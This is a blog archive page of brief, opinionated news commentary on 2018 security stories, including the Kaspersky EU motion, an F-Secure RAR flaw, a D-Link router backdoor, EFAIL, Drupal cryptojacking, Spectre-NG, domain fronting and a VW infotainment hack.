Musings tagged as security

The snake oil vendor who has fallen from grace in western main stream politics Kaspersky has temporarily halted its cooperation with Europol. This came after a vote in the plenary session of the European Parliament which put forward a motion which advises EU states to exclude and ban programs and equipment that have been confirmed as malicious. (Apparently for most politicians this does not fall under common sense)

The problem is that this motion explicitly mentions Kaspersky, so they have been rather peeved in the process.

The big question is: Will the EU now ban Windows 10, Alexa, Cortana, Siri, and several other malicious pieces of tech? ^^

F-Secure Not So Secure

Wed, Jun 6, 2018

Another snake oil vulnerability was unveiled recently. F-Secure allows for arbitrary code execution by means of a specially crafted RAR archive. Since it scans files without asking, there is not much an affected user can do about that if such a file ends up in the claws of his F-Secure Installation.

Remember the urgent public safety issue from not too long ago? Turns out the FBI has repeatedly overstated figures in connection to the so-called encryption threat to the Congress and public. Among others the FBI claimed they were locked out of nearly 7,800 devices connected to crimes when, in reality, the actual number was more between 1,000 and 2,000. Apparently a “programming error” is to blame which lead to miscounting of the devices. Yeah … right …

Another Day Another Backdoor

Wed, May 23, 2018

Kaspersky Lab researchers have discovered a backdoor in D-Link DIR-620 routers. There is also no way for the owners of these routers to disable this account. There are also three other vulnerabilities the researchers found in the firmware of these devices. Recovery of Telnet credentials, URL injection leading to the execution of OS commands, and XSS in the “Quick Search” admin panel are the other three.

PGP Vulnerabilities Discovered

Mon, May 14, 2018

Security researchers have discovered vulnerabilities within implementations of PGP and S/MIME. Now, apparently the GnuPG team was not contacted beforehand and they dismiss the recommendation of the researchers, to immediately stop using anything PGP or S/MIME related, as overblown.

While the researchers refused to immediately disclose the exact nature of the vulnerabilities the GnuPG team has released a statement. The gist of the vulnerabilities seems to be using malicious scripts to exploit broken MIME parsers. This also means that you are only vulnerable if you are using HTML mails, in which case you are evil anyway. ;)

A new cryptojacking campaign is going around which leverages a vulnerability in the Drupal content management system. Security researcher Troy Mursch has a nice writeup on the issue and also runs a list of affected sites.

Basically the vulnerability is exploited to install cryptomining javascript code which then leverages the CPU of website visitors to mine cryptocurrency.

Among the affected sites are also such names as Lenovo, the UCLA, the Turkish Revenue Administration Aydin Tax Office (oh sweet irony), and DLink Brazil. Serving as an important reminder what can happen if you do not update your shit!

The German computer magazine c’t has published an article (english version) in which it claims to have exclusive information regarding eight new security holes in Intel processors.

Dubbed “Spectre Next Generation”, or Spectre-NG for short, these flaws apparently are more severe and more easily exploited than the previously known variants. At the moment they refrain from posting technical details to give Intel a head start but apparently one of the imposed deadlines runs out on May 7th.

With Spectre-NG you can attack the host system from a virtual machine or other VMs running on the same host, making these bugs extremely destructive to cloud and shared hosting providers.

It will be interesting to see how things unfold. Together with the recently released updated Ryzen CPU line from AMD, which seems to perform quite well so far, this might be even more reason to consider a switch to AMD. Provided they are not affected by Spectre-NG.

After tor users found out that google quietly disabled domain fronting on their servers, Amazon apparently wants to make more of a fuss. They sent a letter to the Signal foundation threatening to take them off their servers if they do not stop using domain fronting. The linked blog post by Signal founder Moxie has some explanation as to what domain fronting is and how it helps to circumvent censorship in countries like Iran, Iraq, UAE and the like.

Good reason to cancel your Amazon Prime account and focus more on using alternative online warehouses if you ask me. Helping questionable regimes with their censorship efforts by threatening the only properly secure messaging service out there is pretty fucked up.

It is happening. The stupidity of the car manufacturers making IoT devices out of cars is showing itself more and more. Concerns over companies creating remote pathways into their vehicles electronics and drive systems has long been criticized by security professionals and it looks like, of course, they were right. A dutch cyber security firm apparently hacked a VW Golf GTE and Audi A3 Sportback via WiFi and also via USB.

They gained access to In-Vehicle Infotainment (IVI) systems root account and

Under certain conditions attackers could listen in to conversations the driver is conducting via a car kit, turn the microphone on and off, as well as gaining access to the complete address book and the conversation history

Oh, nice! But wait, there is more

Furthermore, due to the vulnerability, there is the possibility of discovering through the navigation system precisely where the driver has been, and to follow the car live wherever it is at any given time

It gets better and better but at least they were not able to control the cars automotive function…

Keuper and Alkemade say the IVI system is also indirectly connected to the car’s acceleration and braking system, but they stopped investigating the possibility of interacting with those systems fearing they might breach Volkswagen’s intellectual property